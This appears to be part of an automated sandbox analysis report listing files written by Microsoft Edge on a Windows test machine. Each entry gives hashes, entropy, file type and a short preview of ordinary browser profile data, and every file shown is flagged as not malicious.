                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):315
                                                                                                                                                                                                                  Entropy (8bit):5.150942177918384
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQjt1N723oH+Tcwtk2WwnvB2KLlpPQoIVjyq2PN723oH+Tcwtk2WwnvIFUv:7opaYebkxwnvFLTooIVOvVaYebkxwnQg
                                                                                                                                                                                                                  MD5:F436344FDAF9F965D56C5CAEB0A97453
                                                                                                                                                                                                                  SHA1:D51929004872160C06E4E2BCBF9C5B7001619F6F
                                                                                                                                                                                                                  SHA-256:1248631F2E11D965738BD86592DF1E77FD743056D99B8740482B91DD9E71D4F9
                                                                                                                                                                                                                  SHA-512:62B913CA1D434B2867CC9D4C739E851969E4454613F7F26DE7412F5FAF301A7D7FA5D202241FAFCBB6E0BAA88F3CEC32E79EC766DC4944F46011D9CA7870C501
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:15.398 2150 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/18-15:06:16.108 2150 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                  Entropy (8bit):5.324615188227307
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RE:C1gAg1zfv8
                                                                                                                                                                                                                  MD5:005ED1E5E4893BB2B3C59A24CD446B73
                                                                                                                                                                                                                  SHA1:2BA9B4BE128E1BA40DD20371744321BD4397DD53
                                                                                                                                                                                                                  SHA-256:E4D10756E2ED22A866C02683022A102928445F7F74EE40EA6F92E7102601E837
                                                                                                                                                                                                                  SHA-512:16F7E6B3C65F34955DF9B9F478ECFCBD7080FD2F751189EADB83423F3B8DBB3D18C8ED6B9885A11892F943F94B4C537C5D1FD93940B74020CAB73E47B42EE843
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.179765000180042
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQpUN+q2PN723oH+Tcwt8aPrqIFUt8OPQJ5Zmw+OPQJtVkwON723oH+Tcwt8amd:7opNvVaYebL3FUt8OoT/+OoJ5OaYebQJ
                                                                                                                                                                                                                  MD5:47BDDDA33785A578E1B4157018AD71D0
                                                                                                                                                                                                                  SHA1:157E7E1B78DD2DFFD3DF43C76B0F08FF242E2FBA
                                                                                                                                                                                                                  SHA-256:D238CACD4FDE92DAB7E58749AAB8E89BC92903B5D3FE44145349E9458A98CC63
                                                                                                                                                                                                                  SHA-512:31EE8C740A5A73C130AAD45AC0B4FF4C7E1019DF793AE55376BABF936EA290DAAA6EA493E782D6C3DA71954F396B0313B035EFFEF41FA49F2590AC6870355B43
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.413 1e78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/18-15:06:08.519 1e78 Recovering log #3.2024/12/18-15:06:08.519 1e78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                  Entropy (8bit):5.184448623321851
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQXdFN+q2PN723oH+Tcwt865IFUt8OPQjFoZmw+OPQRVkwON723oH+Tcwt86+Ud:7oXovVaYeb/WFUt8Oo5o/+Oo/5OaYebD
                                                                                                                                                                                                                  MD5:ACEAADF534F3BA4F959F790296214098
                                                                                                                                                                                                                  SHA1:749A4AB2CB1F1A96D660ECC82A4CB5D3B3E6D7B0
                                                                                                                                                                                                                  SHA-256:2E224A7F6A898792CE7FD46CA1E359C60E92750B3AE2862F78C80FEB9A195607
                                                                                                                                                                                                                  SHA-512:D8F8021D01EC5E3553B394E1621361D98FC4DDED81C86A93336E06C62E20E13964B6D3CB261C676C88409599A19409721FE8B8CA9D210A1E78E3318552B836DE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.531 1e78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/18-15:06:08.534 1e78 Recovering log #3.2024/12/18-15:06:08.535 1e78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.158758175301928
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQ4q2PN723oH+Tcwt8NIFUt8OPQJZmw+OPQDkwON723oH+Tcwt8+eLJ:7o4vVaYebpFUt8OoJ/+OoD5OaYebqJ
                                                                                                                                                                                                                  MD5:6490A37A7BE883F33270C51A6297398C
                                                                                                                                                                                                                  SHA1:2859A9AAD46A0E760ED9722C37C45A80E97AAF49
                                                                                                                                                                                                                  SHA-256:70604A4B37C20DB64CECC0CB21A499F13A2D158659FA7BE5F90813102C67CA80
                                                                                                                                                                                                                  SHA-512:D669793B20A6AC562B4C501187B64ECE5966DA7968FAE75074C30A33D4BC6CB39F5A84E7B1B3F1684DAB02CA3BAEB522D0B21ADEEE0E564864AD152DB503EBBC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.569 1e14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/18-15:06:09.569 1e14 Recovering log #3.2024/12/18-15:06:09.569 1e14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                  Entropy (8bit):0.5672091307983632
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:+7nJLWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE8ye:+LchH+bDo3iN0Z2TVJkXBBE3ybN
                                                                                                                                                                                                                  MD5:8FE6CA19340DFCC0E1E4808530BC3E49
                                                                                                                                                                                                                  SHA1:648A86121A8D7FE387D00A75CE24F2ED877B3E55
                                                                                                                                                                                                                  SHA-256:5CA75A02E9D45E5ACA71152BBA1B1DD755A89B538E84AD77E0BA9EFC6BE25D46
                                                                                                                                                                                                                  SHA-512:83BCBFDE77691F985FB73775209DE3953F792B807AA50C053A4A9C19E6E393D707AB2DDFE968DCF0E4EBA4E9C66EB7EF69321DEA8ECF92F3BCA21D081592B2BA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                                  Entropy (8bit):0.21880421027789762
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:IRR9tFlljq7A/mhWJFuQ3yy7IOWUhtdweytllrE9SFcTp4AGbNCV9RUIV:IG75fOjtd0Xi99pEY7
                                                                                                                                                                                                                  MD5:BD9ED092B9E721FD01C8511ECDC04F06
                                                                                                                                                                                                                  SHA1:22C1D59753161FE1858B9865C807C3AFDCD90F25
                                                                                                                                                                                                                  SHA-256:2A1AF535632BE9EA13446E70232BC5B4217E856DC4259305F19D1137F42904D6
                                                                                                                                                                                                                  SHA-512:4053BBB9D2522670D288141BD2DD3D31BB6D9FD720B49D041347429BE5A5DF3F6F86C478ABAC70B931A3DC0E0BD81C3251C2703E1A35FAC51C547270BB3FB593
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                  Entropy (8bit):3.647397366286664
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:aj9P0qjlbP/Kbtpgam6I8QkQerNcQhj773pLLRKToaAu:adhlbP/jse2CQF7NRKcC
                                                                                                                                                                                                                  MD5:3BE7D22EF9BF6430773AF449D27CDB3F
                                                                                                                                                                                                                  SHA1:AD7EBC0041F0ED0DA62987DC1B6A6A6097F131F6
                                                                                                                                                                                                                  SHA-256:3A64650CBBD2CBF16FE67A738A002894CBB736EA8CE67F7593E0E9A8F072DF47
                                                                                                                                                                                                                  SHA-512:13EC01D2A4CE515382B0FD2095A937182419220C44C64FE99EA628848C3CDC117CBB689FE4AEE9746CD21F1145F6F4746F1D9E2B072FFE41E515AE05825F7273
                                                                                                                                                                                                                  Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                  Entropy (8bit):5.234920520334817
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7ooqROvVaYeb8rcHEZrELFUt8Oo4/+Oog5OaYeb8rcHEZrEZSJ:7ooqRMVaYeb8nZrExg8OoYoKOaYeb8nP
                                                                                                                                                                                                                  MD5:1BB1628411A9DAE6F012CE2A7BA6139E
                                                                                                                                                                                                                  SHA1:EA11EF263ADF65DA54F129E2B7E337512C501794
                                                                                                                                                                                                                  SHA-256:6AC534B9D88AD021E25EB18AEE902C2766ADD4853E7ED397F8726D3B22032C36
                                                                                                                                                                                                                  SHA-512:ECA31D71A842F0B3D9188836B89EE7CD2760EB38A1DD420557AF5DEE73EEBAF0D25B97B24D990AEB323950A4A69817D89CB5FCB36293DD3FAEB074B37D6F2D18
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:14.031 1e14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/18-15:06:14.032 1e14 Recovering log #3.2024/12/18-15:06:14.032 1e14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                  Entropy (8bit):5.154704494248405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQE4pQL+q2PN723oH+Tcwt8a2jMGIFUt8OPQCGGKWZmw+OPQ4QLVkwON723oH+k:7oEGQ+vVaYeb8EFUt8OoTGKW/+Oo4QVu
                                                                                                                                                                                                                  MD5:0D9D49EE16111BDCF7171CF9AFAFCA6E
                                                                                                                                                                                                                  SHA1:CAB2333E79B4492D372943E0A8929BC5D4E7F3D4
                                                                                                                                                                                                                  SHA-256:E52BE980FE526DEF9BE89632A7B60B4BFEF3D08E33D494D0B4A0F0385C6C32A6
                                                                                                                                                                                                                  SHA-512:5A02B00BA289DD672B99D57D0745DFAA603C54B89B192F02B47FC3083FB776A3024F2C66AD846248D32B4350AB5DA6DCFA7B2D11003591207E00587A19DBCC09
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.692 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:06:08.694 1eec Recovering log #3.2024/12/18-15:06:08.697 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1452
                                                                                                                                                                                                                  Entropy (8bit):5.287526653429432
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                                                                                                                                                  MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                                                                                                                                                  SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                                                                                                                                                  SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                                                                                                                                                  SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1597
                                                                                                                                                                                                                  Entropy (8bit):5.320181140794784
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YcCpfC0gCzsCRtswfcKs5fleeIkBKYhbj:F2fh7R/mfkeIkBvh/
                                                                                                                                                                                                                  MD5:E975A6B9EC0B3C30AF3FA39ACEC4CD2A
                                                                                                                                                                                                                  SHA1:989C4D1F41B7C2648C2F8EDDFA387B5499BCCD5F
                                                                                                                                                                                                                  SHA-256:3D2FB10C0FDCCD89B1EACC382E2404CC3D8639A20BA9E515341A12AF53A6489F
                                                                                                                                                                                                                  SHA-512:4C13A0D7798F269EF2DE20D14094A0A025B27784B2B40E5032C4AA18A99E23CA7434F154E78929E1D36AE452BA3BBB286EFDECA1ACB3939A7E3423FC825A6351
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381617973089606","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381617980043709","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
